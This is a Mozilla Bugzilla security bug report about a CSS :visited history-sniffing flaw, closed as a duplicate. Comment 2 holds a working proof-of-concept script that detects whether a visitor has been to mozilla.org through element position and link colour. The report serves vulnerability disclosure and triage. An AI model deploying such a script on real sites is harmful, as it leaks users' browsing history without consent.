Closed
Bug 127041
Opened 24 years ago
Closed 24 years ago
possible to check if a site has been visited
Categories
(Core :: Security, defect)
Core
Security
Tracking
()
People
(Reporter: bugzilla, Assigned: security-bugs)
References
()
Details
I'm not sure if this is a bug a bug or not, but I found this on bugtraq.
1) Clear Mozilla browser history
2) visit http://gemal.dk/browserspy/css-moz.html
3) visit http://mozilla.org
4) visit http://gemal.dk/browserspy/css-moz.html
the page can tell if you visited http://mozilla.org
done via style sheet and visited
|
Reporter | |
Comment 1•24 years ago
|
||
the URL is now:
http://gemal.dk/browserspy/css.html
|
||
Comment 2•24 years ago
|
||
div class="normal">
<a id="j" href="http://mozilla.org/"> </a>
<style>
#j { position: absolute; top: 0; }
#j:visited { top: 100px; color: #660001; }
</style>
<script>
var j=document.getElementById('j');
var v=0;
if (j && 'offsetTop' in j)
if (j.offsetTop == 100)
v=1;
if (j && 'currentStyle' in j && 'color' in j.currentStyle)
if (j.currentStyle.color == '#660001')
v=1;
if (v)
document.writeln('You have been visiting mozilla.org lately! That very good!
Now clear your browsers history and reload!');
else
document.writeln('You haven\'t been visiting mozilla.org lately. Go ahead <a
href="http://mozilla.org/">mozilla.org</a> and then come back...');
</script>
|
Assignee | |
Comment 3•24 years ago
|
||
Essentially the same issue as 57351, which is still assigned to me but I may
WONTFIX it. I just can't think of a way to solve it without getting rid of the
"visited" rule in CSS. Henrik, can you give us a link to the Bugtraq post?
In any case, the information leakage involved here is pretty limited. *please*
give me your thoughts on the severity of this problem.
*** This bug has been marked as a duplicate of 57351 ***
Status: NEW → RESOLVED
Closed: 24 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•